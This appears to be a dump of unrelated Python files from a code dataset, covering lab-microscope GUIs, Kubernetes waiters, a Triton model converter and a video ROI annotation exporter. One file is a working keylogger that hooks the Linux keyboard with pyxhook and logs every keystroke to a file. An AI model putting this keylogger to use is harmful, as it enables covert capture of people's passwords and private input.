self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def goTo12():
if len(self.positions)>11:
self.GB.stage.goAbsoluteSampleCoordinates(self.positions[11][1],
self.positions[11][2],
edge1, edge2)
self.focusing_and_changing_objectives_manually('Use the buttons to focus and change objective')
return
def on_closing():
self.cancel = True
root.destroy()
root.quit()
return
def load():
self.positions = None
try:
self.filepath = askopenfile().name
print(self.filepath)
except:
return
print(self.filepath)
txt_file_name = self.filepath
with open(txt_file_name) as f:
lines = f.readlines()
lines = [line.rstrip('\n') for line in open(txt_file_name)]
self.positions = [[] for i in range(len(lines))]
for i in range(len(lines)):
lines[i] = lines[i].split(' ')
for j in range(len(lines[i])):
if lines[i][j] != '':
self.positions[i].append(float(lines[i][j]))
for i in range(12):
tk.Label(mainframe, text=' ').grid(row = i+1, column = 0)
tk.Label(mainframe, text=' ').grid(row = i+1, column = 1)
tk.Label(mainframe, text=' ').grid(row = i+1, column = 2)
if i < len(lines):
tk.Label(mainframe, text=int(self.positions[i][0])).grid(row = i+1, column = 0)
tk.Label(mainframe, text=self.positions[i][1]).grid(row = i+1, column = 1)
tk.Label(mainframe, text=self.positions[i][2]).grid(row = i+1, column = 2)
return
root = tk.Tk()
root.title("Visit good Flakes")
# Add a grid
mainframe = tk.Frame(root)
mainframe.grid(row=0)
# add coordinates
tk.Label(mainframe, text="Pos").grid(row = 0, column = 0)
tk.Label(mainframe, text="X").grid(row = 0, column = 1)
tk.Label(mainframe, text="Y").grid(row = 0, column = 2)
load_button = tk.Button(mainframe, text='Load .txt file', command=load)
load_button.grid(row=0, column=3)#, columnspan=2)
button_pos1 = tk.Button(mainframe, text='->', command=goTo1)
button_pos2 = tk.Button(mainframe, text='->', command=goTo2)
button_pos3 = tk.Button(mainframe, text='->', command=goTo3)
button_pos4 = tk.Button(mainframe, text='->', command=goTo4)
button_pos5 = tk.Button(mainframe, text='->', command=goTo5)
button_pos6 = tk.Button(mainframe, text='->', command=goTo6)
button_pos7 = tk.Button(mainframe, text='->', command=goTo7)
button_pos8 = tk.Button(mainframe, text='->', command=goTo8)
button_pos9 = tk.Button(mainframe, text='->', command=goTo9)
button_pos10 = tk.Button(mainframe, text='->', command=goTo10)
button_pos11 = tk.Button(mainframe, text='->', command=goTo11)
button_pos12 = tk.Button(mainframe, text='->', command=goTo12)
button_pos1.grid(row=1, column=3)#, columnspan=2)
button_pos2.grid(row=2, column=3)#, columnspan=2)
button_pos3.grid(row=3, column=3)#, columnspan=2)
button_pos4.grid(row=4, column=3)#, columnspan=2)
button_pos5.grid(row=5, column=3)#, columnspan=2)
button_pos6.grid(row=6, column=3)#, columnspan=2)
button_pos7.grid(row=7, column=3)#, columnspan=2)
button_pos8.grid(row=8, column=3)#, columnspan=2)
button_pos9.grid(row=9, column=3)#, columnspan=2)
button_pos10.grid(row=10, column=3)#, columnspan=2)
button_pos11.grid(row=11, column=3)#, columnspan=2)
button_pos12.grid(row=12, column=3)#, columnspan=2)
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
class UserInterface(object):
def __init__(self): #,stage = False):
# self.x_pos = None
# self.y_pos = None
# if stage:
# self.stage = st.Marzhauser('COM4', simulation=True)
# self.yes_or_no = None
# self.z_pos = 37000
self.cancel = False
self.filepath = None
def message_box(self, text):
'''
This function generates a messagebox with OK and cancel and displays
a given text. It sets self.cancel = True when cancelling the window.
Parameters
----------
text: string
The text which will be displayed.
'''
root = tk.Tk()
root.attributes("-topmost", True)
root.withdraw()
self.cancel = not(messagebox.askokcancel("Information", text))
if self.cancel == True:
return
def message_box_only(self, text):
'''
This function generates a messagebox and displays a given text.
Parameters
----------
text: string
The text which will be displayd.
'''
root = tk.Tk()
root.attributes("-topmost", True)
root.withdraw()
messagebox.showinfo("Information", text)
def enter_sample_coordinates(self):
'''
This function generates a window where the user can enter two numbers,
one for x-value in sample coordinates and one for the y-value. It
returns these values.
Returns
-------
x_sample: float
x-value given by the user's input.
y_sample: float
y-value given by the user's input.
'''
root = tk.Tk()
root.attributes("-topmost", True)
root.title('Enter Sample Coordinates')
root.withdraw()
d = MyDialog(root)
result = d.result
root.destroy()
if result is None:
return None, None
return result['x_sample'], result['y_sample']
def call_startup_message_boxes(self):
self.message_box('Press \'OK\' and select a folder in which the '
'pictures should be stored. It should '
'not be on a network dirve!')
if self.cancel == True:
return
root_file_diag = tk.Tk()
root_file_diag.withdraw()
self.filepath = askdirectory()
root_file_diag.destroy()
root_file_diag.quit()
# # not needed?
# def call_userinterface_message_boxes(self,position):
# '''
# This function opens the user interface. It only needs a string with a
# description of the position of the wished point. It gives back the (x,y)-
# tuple of position where the stage is currently.
#
# Parameters
# ----------
# position: string
# Describes the position of the desired point.
# E.g. 'South-West'.
#
# '''
# self.x_pos = None
# self.y_pos = None
# self.message_box('Move to edge point: {pos} and click \'OK\'.'.format(pos=position))
# self.x_pos = self.stage.getPos()[0]
# self.y_pos = self.stage.getPos()[1]
# return (self.x_pos, self.y_pos)
#
# # not needed?
# def call_successfully_stored_message_boxes(self,success):
# if success == True:
# self.message_box('The edge points have been stored successfully. '
# 'Please move to an area somewhere on the chip, '
# 'press \'OK\' and follow further instructions.')
# else:
# return
#
# # not needed?
# def get_edge_points_message_boxes(self):
# '''
# This function takes input from the user and gives back the three
# edge points.
# '''
# position_names = ['South-West', 'South-East', 'North-East']
# positions = []
# for i in range(len(position_names)):
# positions.append(self.call_userinterface_message_boxes(position_names[i]))
# if self.cancel == True:
# return None, None, None
# self.call_successfully_stored_message_boxes(True)
# self.stage.close()
# time.sleep(1)
# return positions[0], positions[1], positions[2]
#
# # not needed?
# def get_2edge_points_message_boxes(self):
# '''
# This function takes input from the user and gives back two edge points.
# '''
# position_names = ['South-West', 'South-East']
# positions = []
# for i in range(len(position_names)):
# positions.append(self.call_userinterface_message_boxes(position_names[i]))
# if self.cancel == True:
# return None, None
# self.stage.close()
# time.sleep(1)
# return positions[0], positions[1]
#
# # not needed anymore
# def call_successfully_stored(self,success):
# def killmainloop():
# root.destroy()
# root.quit()
# if success == True:
# msg_text = 'The edge points have been stored successfully. \nPlease move to an area somewhere on the chip, \nthen press \'OK\' to continue.'
# else:
# msg_text = 'You quit the procedure. Start the \nprogram again.'
# root = tk.Tk()
# root.geometry("220x80+300+300")
# root.attributes("-topmost", True)
# root.title('Status Report')
# frame = tk.Frame(root)
# frame.pack()
# message = tk.Label(frame)
# message.config(text=msg_text)
# message.pack()
# OK_button = tk.Button(frame, text='OK', command=killmainloop)
# OK_button.pack()
# tk.mainloop()
#
# # not needed anymore
# def call_startup(self):
# def get_filepath():
# '''
# This function opens a dialog window to choose the path to a folder where
# the pictures will be stored. It returns this path.
# '''
# root.destroy()
# root.quit()
# root_file_diag = tk.Tk()
# root_file_diag.withdraw()
# self.filepath = askdirectory()
# print("Store path:", self.filepath)
# root_file_diag.destroy()
# root_file_diag.quit()
#
# root = tk.Tk()
# root.geometry("220x80+300+300")
# root.attributes("-topmost", True)
# root.title('Program Startup')
# frame = tk.Frame(root)
# frame.pack()
# message = tk.Label(frame)
# message.config(text='Press \'OK\' and select a folder in which \nthe '
# 'pictures should be stored. \nIt should '
# 'not be on a network dirve!')
# message.pack()
# OK_button = tk.Button(frame, text='OK', command=get_filepath)
# OK_button.pack()
# tk.mainloop()
#
# # not needed anymore
# def get_edge_points(self):
# '''
# This function takes input from the user and gives back the three
# edge points.
# '''
# position_names = ['South-West', 'South-East', 'North-East']
# positions = []
# for i in range(len(position_names)):
# positions.append(self.call_userinterface(position_names[i]))
# if (positions[i])[0] is None:
# self.call_successfully_stored(False)
# return None, None, None
# self.message_box('Thank you, the edge points have been stored successfully. '
# 'Please move to an area somewhere on the chip and press \'OK\' '
# 'to continue.')
# self.stage.close()
# time.sleep(1)
# return positions[0], positions[1], positions[2]
#
# # not needed anymore
# def good_focus_area(self):
# def yes():
# self.yes_or_no = 'y'
# root.destroy()
# root.quit()
# def no():
# self.yes_or_no = 'n'
# root.destroy()
# root.quit()
# self.yes_or_no = None
# root = tk.Tk()
# root.geometry("220x80+300+300")
# root.attributes("-topmost", True)
# root.title('Confirm Area')
# frame = tk.Frame(root)
# frame.pack()
# message = tk.Label(frame)
# message.config(text='Is this a good area for focus pictures?')
# message.pack()
# YES_button = tk.Button(frame, text='YES', command=yes)
# YES_button.pack(side=tk.LEFT)
# NO_button = tk.Button(frame, text='NO', command=no)
# NO_button.pack(side=tk.RIGHT)
# tk.mainloop()
#
# # not needed anymore
# def call_userinterface(self,position):
# '''
# This function opens the user interface. It only needs a string with a
# description of the position of the wished point. It gives back the (x,y)-
# tuple of position where the stage is currently.
#
# Parameters
# ----------
# position: string
# Describes the position of the desired point.
# E.g. 'South-West'.
#
# '''
# def save_edge_point():
# '''
# After clicking the 'Store Position' button close the window.
# '''
# self.x_pos = self.stage.getPos()[0]
# self.y_pos = self.stage.getPos()[1]
# root.destroy()
# root.quit()
# self.x_pos = None
# self.y_pos = None
# root = tk.Tk()
# root.geometry("220x80+300+300")
# root.attributes("-topmost", True)
# root.title('Input Edge Point \'{pos}\''.format(pos=position))
# frame = tk.Frame(root)
# frame.pack()
# message = tk.Label(frame)
# message.config(text='Move to edge point: {pos} \nand click \'Store Position\'.'.format(pos=position))
# message.pack()
# store_button = tk.Button(frame, text='Store Position', command=save_edge_point)
# store_button.pack()
# tk.mainloop()
# return (self.x_pos, self.y_pos)
def call_initial_program_start(self):
'''
This function generates a menu in which one can set a magnification
(10x, 20x or 50x) and an overlap in % (between 1 and 99) to perform
the scan. These parameters are then stored in self.mag and self.ovlap.
'''
self.cancel = False
self.mag = None
self.ovlap = None
def on_closing():
self.cancel = True
root.destroy()
root.quit()
return
def ok():
self.mag = tkvar_mag.get()
if self.mag == '' or self.ovlap == '':
self.mag = None
self.ovlap = None
self.message_box_only('Please set both, a magnification and an overlap in %')
return
self.mag = int(self.mag[:-1])
try:
self.ovlap = float(overlap.get())
except:
self.message_box_only('Please enter a number between 1 and 99 for the overlap in %')
return
if type(self.ovlap) != float or self.ovlap<1 or self.ovlap>99:
self.message_box_only('Please enter a number between 1 and 99 for the overlap in %')
return
self.ovlap /= 100.
root.destroy()
root.quit()
return
root = tk.Tk()
root.title("Getting started - Settings for scan")
# Add a grid
mainframe = tk.Frame(root)
mainframe.grid(row=0)
# Create a Tkinter variable
tkvar_mag = tk.StringVar(root)
# Dictionary with options
magnification = { '10x','20x','50x'}
tkvar_mag.set('10x')
popupMenu_mag = tk.OptionMenu(mainframe, tkvar_mag, *magnification,)
overlap = tk.Entry(mainframe,width=6)
tk.Label(mainframe, text="Set magnification").grid(row = 1, column = 0)
tk.Label(mainframe, text="Set overlap in %").grid(row = 1, column = 2)
popupMenu_mag.grid(row = 2, column =0)
overlap.grid(row=2, column=2)
# on change dropdown value
def change_dropdown_mag(*args):
#print("mag:", tkvar_mag.get() )
pass
tkvar_mag.trace('w', change_dropdown_mag)
root.protocol("WM_DELETE_WINDOW", on_closing)
OK_button= tk.Button(mainframe, text='OK', width=10, command=ok)
OK_button.grid(row=4, column=1)#, columnspan=2)
root.mainloop()
# def reload_sample(self):
# self.cancel = False
# self.filepath = None
# self.positions = None
# def goTo1():
# if len(self.positions)>0:
# print(self.positions[0][1],
# self.positions[0][2])
# self.enter_sample_coordinates()
# return
# def goTo2():
# if len(self.positions)>1:
# print(self.positions[1][1],
# self.positions[1][2])
# self.enter_sample_coordinates()
# return
# def goTo3():
# if len(self.positions)>2:
# print(self.positions[2][1],
# self.positions[2][2])
# self.enter_sample_coordinates()
# return
# def goTo4():
# if len(self.positions)>3:
# print(self.positions[3][1],
# self.positions[3][2])
# self.enter_sample_coordinates()
# return
# def goTo5():
# if len(self.positions)>4:
# print(self.positions[4][1],
# self.positions[4][2])
# self.enter_sample_coordinates()
# return
# def goTo6():
# if len(self.positions)>5:
# print(self.positions[5][1],
# self.positions[5][2])
# self.enter_sample_coordinates()
# return
# def goTo7():
# if len(self.positions)>6:
# print(self.positions[6][1],
# self.positions[6][2])
# self.enter_sample_coordinates()
# def goTo8():
# if len(self.positions)>7:
# print(self.positions[7][1],
# self.positions[7][2])
# self.enter_sample_coordinates()
# return
# def goTo9():
# if len(self.positions)>8:
# print(self.positions[8][1],
# self.positions[8][2])
# self.enter_sample_coordinates()
# return
# def goTo10():
# if len(self.positions)>9:
# print(self.positions[9][1],
# self.positions[9][2])
# self.enter_sample_coordinates()
# return
# def goTo11():
# if len(self.positions)>10:
# print(self.positions[10][1],
# self.positions[10][2])
# self.enter_sample_coordinates()
# return
# def goTo12():
# if len(self.positions)>11:
# print(self.positions[11][1],
# self.positions[11][2])
# self.enter_sample_coordinates()
# return
#
#
# def on_closing():
# self.cancel = True
# root.destroy()
# root.quit()
# return
# def load():
# self.positions = None
# try:
# self.filepath = askopenfile().name
# print(self.filepath)
# except:
# return
# print(self.filepath)
# txt_file_name = self.filepath
# with open(txt_file_name) as f:
# lines = f.readlines()
# lines = [line.rstrip('\n') for line in open(txt_file_name)]
# self.positions = [[] for i in range(len(lines))]
# for i in range(len(lines)):
# lines[i] = lines[i].split(' ')
# for j in range(len(lines[i])):
# if lines[i][j] != '':
# self.positions[i].append(float(lines[i][j]))
# for i in range(12):
# tk.Label(mainframe, text=' ').grid(row = i+1, column = 0)
# tk.Label(mainframe, text=' ').grid(row = i+1, column = 1)
# tk.Label(mainframe, text=' ').grid(row = i+1, column = 2)
# if i < len(lines):
# tk.Label(mainframe, text=int(self.positions[i][0])).grid(row = i+1, column = 0)
# tk.Label(mainframe, text=self.positions[i][1]).grid(row = i+1, column = 1)
# tk.Label(mainframe, text=self.positions[i][2]).grid(row = i+1, column = 2)
# return
#
# root = tk.Tk()
# root.title("Visit good Flakes")
# # Add a grid
# mainframe = tk.Frame(root)
# mainframe.grid(row=0)
# # add coordinates
# tk.Label(mainframe, text="Pos").grid(row = 0, column = 0)
# tk.Label(mainframe, text="X").grid(row = 0, column = 1)
# tk.Label(mainframe, text="Y").grid(row = 0, column = 2)
#
# load_button = tk.Button(mainframe, text='Load .txt file', command=load)
# load_button.grid(row=0, column=3)#, columnspan=2)
#
# button_pos1 = tk.Button(mainframe, text='->', command=goTo1)
# button_pos2 = tk.Button(mainframe, text='->', command=goTo2)
# button_pos3 = tk.Button(mainframe, text='->', command=goTo3)
# button_pos4 = tk.Button(mainframe, text='->', command=goTo4)
# button_pos5 = tk.Button(mainframe, text='->', command=goTo5)
# button_pos6 = tk.Button(mainframe, text='->', command=goTo6)
# button_pos7 = tk.Button(mainframe, text='->', command=goTo7)
# button_pos8 = tk.Button(mainframe, text='->', command=goTo8)
# button_pos9 = tk.Button(mainframe, text='->', command=goTo9)
# button_pos10 = tk.Button(mainframe, text='->', command=goTo10)
# button_pos11 = tk.Button(mainframe, text='->', command=goTo11)
# button_pos12 = tk.Button(mainframe, text='->', command=goTo12)
#
# button_pos1.grid(row=1, column=3)#, columnspan=2)
# button_pos2.grid(row=2, column=3)#, columnspan=2)
# button_pos3.grid(row=3, column=3)#, columnspan=2)
# button_pos4.grid(row=4, column=3)#, columnspan=2)
# button_pos5.grid(row=5, column=3)#, columnspan=2)
# button_pos6.grid(row=6, column=3)#, columnspan=2)
# button_pos7.grid(row=7, column=3)#, columnspan=2)
# button_pos8.grid(row=8, column=3)#, columnspan=2)
# button_pos9.grid(row=9, column=3)#, columnspan=2)
# button_pos10.grid(row=10, column=3)#, columnspan=2)
# button_pos11.grid(row=11, column=3)#, columnspan=2)
# button_pos12.grid(row=12, column=3)#, columnspan=2)
#
# root.protocol("WM_DELETE_WINDOW", on_closing)
# root.mainloop()
if __name__ == "__main__":
UI = UserInterface()
# UI.call_initial_program_start()
UI.reload_sample()
print(UI.cancel)
print(UI.positions)
# UI.test_ask_file()
# UICB = UserInterfaceCallBack()
# UICB.focusing_and_changing_objectives_manually('Hello')
# UI.message_box('Hello')
# filepath = UI.get_filepath()
# pos1, pos2, pos3 = UI.get_edge_points()
# print(filepath)
# print(pos1,pos2,pos3)
# UI.good_focus_area()
# UI.message_box("Hello")
| StarcoderdataPython |
3376578 | """
Configuration for model.
"""
from __future__ import annotations
import json
from pathlib import Path
from typing import TypedDict
filename = "config.json"
class ConfigData(TypedDict):
iterations: int
window_size: int
def read(path: Path) -> ConfigData:
with open(path / filename, "r", encoding="utf-8") as datafile:
data: ConfigData = json.load(datafile)
return data
def store(data: ConfigData, path: Path) -> None:
with open(path / filename, "w", encoding="utf-8") as datafile:
json.dump(data, datafile)
| StarcoderdataPython |
186992 | <reponame>YaguangZhang/EarsMeasurementCampaignCode
# Open a serial port even if it's currently occupied.
#
# <NAME>, Purdue University, 2017-06-13
import serial
def openPort (p="COM5", b=9600, t=1):
try:
ser = serial.Serial(port=p, baudrate=b, timeout=t)
# Try to open port, if possible print message.
ser.isOpen()
print ("Port " + p + " is successfully opened!")
return ser
except IOError:
# If port is already opened, close it and open it again, and print
# message.
try:
ser.close()
ser.open()
print ("Port " + p + " was already open... Successfully closed & reopened!")
return ser
except Exception as e:
print ("Failed in opening Port " + p + "!")
print(e)
raise | StarcoderdataPython |
3297593 | <gh_stars>10-100
#!python
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import sys
import os
import re
import time
import dpath.util
import requests
from kubernetes import client, config, watch
def kube_v1():
# Assume we got nothin'.
k8s_api = None
# XXX: is there a better way to check if we are inside a cluster or not?
if "KUBERNETES_SERVICE_HOST" in os.environ:
# If this goes horribly wrong and raises an exception (it shouldn't),
# we'll crash, and Kubernetes will kill the pod. That's probably not an
# unreasonable response.
config.load_incluster_config()
k8s_api = client.CoreV1Api()
else:
# Here, we might be running in docker, in which case we'll likely not
# have any Kube secrets, and that's OK.
try:
config.load_kube_config()
k8s_api = client.CoreV1Api()
except FileNotFoundError:
# Meh, just ride through.
print("No K8s")
pass
return k8s_api
class Waitable (object):
def __init__(self, retries=60, delay=2):
self.retries = retries
self.remaining = 0
self.delay = delay
def check(self):
raise Exception("You need to subclass Waitable and customize check, name, and not_ready")
def name(self):
raise Exception("You need to subclass Waitable and customize check, name, and not_ready")
def not_ready(self):
raise Exception("You need to subclass Waitable and customize check, name, and not_ready")
def wait(self, retries=None, delay=None):
self.remaining = retries if retries else self.retries
if not delay:
delay = self.delay
good=False
while self.remaining > 0:
self.remaining -= 1
if self.check():
good=True
break
print("%s remaining %02d: %s" % (self.name, self.remaining, self.not_ready))
time.sleep(delay)
return good
class WaitForPods (Waitable):
def __init__(self, namespace="default", **kwargs):
super(WaitForPods, self).__init__(**kwargs)
self.pending = -1
self.namespace = namespace
self.k8s_api = kube_v1()
@property
def name(self):
return "WaitForPods"
@property
def not_ready(self):
if self.pending < 0:
return "no pods being checked"
else:
return "%d not running" % self.pending
def check(self):
self.pending = 0
for pod in self.k8s_api.list_namespaced_pod("default").items:
# print("%s found %s -- %s" % (self.name, pod.metadata.name, pod.status.phase))
if pod.status.phase != "Running":
self.pending += 1
rc = self.pending == 0
# print("%s check returning %s" % (self.name, rc))
return rc
class WaitForURL (Waitable):
def __init__(self, url, expected, name=None, not_ready="not yet ready", **kwargs):
super(WaitForURL, self).__init__(**kwargs)
self.url = url
self.expected = re.compile(expected)
self._name = name
self._not_ready = not_ready
@property
def name(self):
return self._name if self._name else "WaitForURL"
@property
def not_ready(self):
return self._not_ready
def check(self):
result = requests.get(self.url)
if (result.status_code // 100) != 2:
print("%s: GET failed (%d)" % (self.name, result.status_code))
return False
text = result.text
if self.expected.search(text):
print("%s: Matched on '%s'" % (self.name, text))
return True
else:
print("%s: no match on '%s'" % (self.name, text))
return False
if __name__ == "__main__":
if WaitForURL(sys.argv[1], sys.argv[2]).wait():
print("Everything OK")
else:
print("Uhoh")
| StarcoderdataPython |
1672019 | """
Copyright (c) 2015, <NAME>
All rights reserved.
A simple keylogger witten in python for linux platform
All keystrokes are recorded in a log file.
The program terminates when grave key(`) is pressed
grave key is found below Esc key
"""
import pyxhook
#change this to your log file's path
log_file='/home/aman/Desktop/file.log'
#this function is called everytime a key is pressed.
def OnKeyPress(event):
fob=open(log_file,'a')
fob.write(event.Key)
fob.write('\n')
if event.Ascii==96: #96 is the ascii value of the grave key (`)
fob.close()
new_hook.cancel()
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session
new_hook.start()
| StarcoderdataPython |
4830286 | <reponame>deepyaman/NVTabular
import os
import subprocess
from shutil import copyfile
import cudf
import tritonclient.http as httpclient
from google.protobuf import text_format
from tritonclient.utils import np_to_triton_dtype
# read in the triton ModelConfig proto object - generating it if it doesn't exist
try:
import nvtabular.inference.triton.model_config_pb2 as model_config
except ImportError:
pwd = os.path.dirname(__file__)
try:
subprocess.check_output(
["protoc", f"--python_out={pwd}", f"--proto_path={pwd}", "model_config.proto"]
)
except Exception as e:
raise ImportError("Failed to compile model_config.proto - is protobuf installed?") from e
import nvtabular.inference.triton.model_config_pb2 as model_config
def generate_triton_model(workflow, name, output_path, version=1):
""" converts a workflow to a triton mode """
workflow.save(os.path.join(output_path, str(version), "workflow"))
_generate_model_config(workflow, name, output_path)
copyfile(
os.path.join(os.path.dirname(__file__), "model.py"),
os.path.join(output_path, str(version), "model.py"),
)
def convert_df_to_triton_input(column_names, batch, input_class=httpclient.InferInput):
columns = [(col, batch[col]) for col in column_names]
inputs = [input_class(name, col.shape, np_to_triton_dtype(col.dtype)) for name, col in columns]
for i, (name, col) in enumerate(columns):
inputs[i].set_data_from_numpy(col.values_host)
return inputs
def convert_triton_output_to_df(columns, response):
return cudf.DataFrame({col: response.as_numpy(col) for col in columns})
def _generate_model_config(workflow, name, output_path):
"""given a workflow generates the trton modelconfig proto object describing the inputs
and outputs to that workflow"""
config = model_config.ModelConfig(name=name, backend="python")
for column in workflow.column_group.input_column_names:
dtype = workflow.input_dtypes[column]
config.input.append(
model_config.ModelInput(name=column, data_type=_convert_dtype(dtype), dims=[-1])
)
for column, dtype in workflow.output_dtypes.items():
config.output.append(
model_config.ModelOutput(name=column, data_type=_convert_dtype(dtype), dims=[-1])
)
with open(os.path.join(output_path, "config.pbtxt"), "w") as o:
text_format.PrintMessage(config, o)
def _convert_dtype(dtype):
""" converts a dtype to the appropiate triton proto type """
if dtype == "float64":
return model_config.TYPE_FP64
if dtype == "float32":
return model_config.TYPE_FP32
if dtype == "float16":
return model_config.TYPE_FP16
if dtype == "int64":
return model_config.TYPE_INT64
if dtype == "int32":
return model_config.TYPE_INT32
if dtype == "int16":
return model_config.TYPE_INT16
if dtype == "int8":
return model_config.TYPE_INT8
if dtype == "uint64":
return model_config.TYPE_UINT64
if dtype == "uint32":
return model_config.TYPE_UINT32
if dtype == "uint16":
return model_config.TYPE_UINT16
if dtype == "uint8":
return model_config.TYPE_UINT8
if dtype == "bool":
return model_config.TYPE_BOOL
if cudf.utils.dtypes.is_string_dtype(dtype):
return model_config.TYPE_STRING
raise ValueError(f"Can't convert dtype {dtype})")
| StarcoderdataPython |
3268442 | from .loader import get_loader
from . import text_classification
from . import named_entity_recognition
from . import extractive_qa
from . import summarization
from . import text_pair_classification
from . import hellaswag
from . import aspect_based_sentiment_classification
| StarcoderdataPython |
3364240 | <filename>recodoc2/apps/doc/parser/special_parsers.py
from __future__ import unicode_literals
from docutil.etree_util import HierarchyXPath, SingleXPath
import doc.parser.common_parsers as cp
class HTClientParser(cp.NewDocBookParser):
xparagraphs = HierarchyXPath('.', './pre')
def __init__(self, document_pk):
super(HTClientParser, self).__init__(document_pk)
def _process_init_page(self, page, load):
load.mix_mode = True
def _process_mix_mode_section(self, page, load, section):
return section.number.startswith('6') and \
not section.title.startswith('Chapter')
class HibernateParser(cp.NewDocBookParser):
def __init__(self, document_pk):
super(HibernateParser, self).__init__(document_pk)
class JodaParser(cp.MavenParser):
xparagraphs = SingleXPath('.//pre')
def _process_init_page(self, page, load):
load.mix_mode = True
def _process_mix_mode_section(self, page, load, section):
return section.title.strip().lower() == 'upgrade'
| StarcoderdataPython |
3263740 | <reponame>mylenefarias/360RAT
from PyQt5 import QtWidgets, QtGui
from Interfaces.save_ok__window import Ui_save
from Service.BlackMask import BlackMask
from Service.GetInputUser import GetInput
from sys import platform
import csv
import os
import sys
import shutil
import cv2
import os.path as osp
class CSV:
def __init__(self, user):
self.list_dictionary = []
self.user = user
self.window_save_csv = QtWidgets.QMainWindow()
if platform == "linux" or platform == "linux2":
# linux
self.window_save_csv.setWindowIcon(QtGui.QIcon(os.getcwd() + "/Images/icon.png"))
elif platform == "win32":
# Windows...
self.window_save_csv.setWindowIcon(QtGui.QIcon(os.getcwd() + "\Images\icon.png"))
self.window_save_csv.setWindowTitle("360Rat")
self.ui_save = Ui_save()
self.ui_save.setupUi(self.window_save_csv)
self.ui_save.pushButton_OK.clicked.connect(self.close_save_csv_window)
self.window_input = GetInput()
ui_input = self.window_input.get_ui()
ui_input.button_OK.clicked.connect(self.save)
ui_input.input.editingFinished.connect(self.save)
self.fps = 60
self.flag_path = False
def close_save_csv_window(self):
self.window_save_csv.hide()
def save_file(self, list_imagens, list_ROI, fps, FOV, dictionary, flag):
self.list_image_anotation = list_imagens
self.list_compose_ROI = list_ROI
self.fps = fps
self.nfov = FOV
self.dict_color = dictionary
self.window_input.set_text_window("Enter your name:")
window = self.window_input.get_window()
self.flag_path = flag
window.show()
def save(self):
self.window_input.close_window()
self.user = self.window_input.get_input_text()
#self.window_input.clear_input_field()
self.list_dictionary.clear()
if self.flag_path == False:
path = os.getcwd()
cwd = osp.join(path, "videosAnotated")
else:
fname = QtWidgets.QFileDialog.getExistingDirectory()
cwd = fname
self.save_imagens_files(cwd)
self.create_dictionary()
self.save_dictionary(cwd)
self.window_save_csv.show()
def save_imagens_files(self, cwd):
head, tail = os.path.split(self.list_image_anotation[0].get_path())
path = osp.join(cwd, self.user)
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(*[cwd, self.user, tail])
if os.path.exists(path):
try:
shutil.rmtree(path)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(*[cwd, self.user, tail, "annotation"])
if not os.path.exists(path):
os.makedirs(path)
mask_path = os.path.join(*[cwd, self.user, tail, "blackMask"])
if not os.path.exists(mask_path):
os.makedirs(mask_path)
path_video = os.path.join(*[cwd, self.user, tail, "video.mp4"])
shape = self.list_image_anotation[0].get_image().shape
width = shape[1]
height = shape[0]
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out_DBSCAN = cv2.VideoWriter(path_video, fourcc, self.fps, (width,height))
blackmask = BlackMask()
for image in self.list_image_anotation:
img_aux = image.get_image().copy()
if image.get_list_roi():
for roi in image.get_list_roi():
#draw ROI
self.nfov(img_aux)
self.nfov.set_fov(roi.get_fov()[1], roi.get_fov()[0])
self.nfov.updateNFOV(roi.get_center_point())
self.nfov.draw_NFOV_edges(img_aux, label_color= self.dict_color[roi.get_label()])
mask_out_path = osp.join(mask_path, '{}.jpg'.format(image.get_id()))
blackmask.draw_black_mask(mask_out_path, image.get_list_roi(), image.get_list_compose_ROI())
frame_out_path = osp.join(path, '{}.jpg'.format(image.get_id()))
#save image in directory
cv2.imwrite(frame_out_path, img_aux)
out_DBSCAN.write(img_aux)
out_DBSCAN.release()
def create_dictionary(self):
for image in self.list_image_anotation:
for roi in image.get_list_roi():
roi_dict = {
"Type" : 0,
"Frame" : image.get_id(),
"Id roi" : roi.get_id(),
"Center_point X" : roi.get_center_point()[0],
"Center_point Y" : roi.get_center_point()[1],
"ROI H" : roi.get_fov()[0],
"ROI W" : roi.get_fov()[1],
"Label" : roi.get_label(),
"Movement" : "**",
"Frame_end" : 0,
"Center_point_end X" : 0,
"Center_point_end Y" :0,
"ROI_end H" : 0,
"ROI_end W" : 0,
"user": self.user,
}
self.list_dictionary.append(roi_dict)
for roi in image.get_list_compose_ROI():
roi_dict = {
"Type" : 1,
"Frame" : image.get_id(),
"Id roi" : roi.get_id(),
"Center_point X" : roi.get_center_point()[0],
"Center_point Y" : roi.get_center_point()[1],
"ROI H" : roi.get_fov()[0],
"ROI W" : roi.get_fov()[1],
"Label" : roi.get_label(),
"Movement" : roi.get_movement(),
"Frame_end" : 0,
"Center_point_end X" : 0,
"Center_point_end Y" :0,
"ROI_end H" : 0,
"ROI_end W" : 0,
"user": self.user,
}
self.list_dictionary.append(roi_dict)
for roi in self.list_compose_ROI:
roi_dict = {
"Type" : 2,
"Frame" : roi.get_frame_init(),
"Id roi" : roi.get_id(),
"Center_point X" : roi.get_center_point_init()[0],
"Center_point Y" : roi.get_center_point_init()[1],
"ROI H" : roi.get_fov_init()[0],
"ROI W" : roi.get_fov_init()[1],
"Label" : roi.get_label(),
"Movement" : roi.get_movement(),
"Frame_end" : roi.get_frame_end(),
"Center_point_end X" : roi.get_center_point_end()[0],
"Center_point_end Y" : roi.get_center_point_end()[1],
"ROI_end H" : roi.get_fov_end()[0],
"ROI_end W" : roi.get_fov_end()[1],
"user": self.user,
}
self.list_dictionary.append(roi_dict)
def save_dictionary(self, cwd):
head, tail = os.path.split(self.list_image_anotation[0].get_path())
path = os.path.join(*[cwd,self.user, tail, f'list_of_Roi_{self.user}_{tail}.csv'])
if os.path.exists(path):
os.remove(path)
keys = self.list_dictionary[0].keys()
with open(path, 'w', newline='') as output_file:
